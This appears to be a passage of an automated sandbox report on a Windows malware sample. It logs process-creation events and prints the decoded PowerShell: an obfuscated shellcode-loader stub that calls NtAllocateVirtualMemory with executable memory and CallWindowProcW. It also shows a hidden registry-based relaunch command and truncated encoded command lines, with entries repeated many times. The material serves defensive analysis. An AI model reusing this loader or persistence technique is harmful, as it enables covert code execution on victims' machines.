Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sv,K+9nZ)Jt^W{v,)^']zrh~
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sv,K+9nZ)Jt^W{v,)^']zrh~
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sv,K+9nZ)Jt^W{v,)^']zrh~
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sv,K+9nZ)Jt^W{v,)^']zrh~
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpA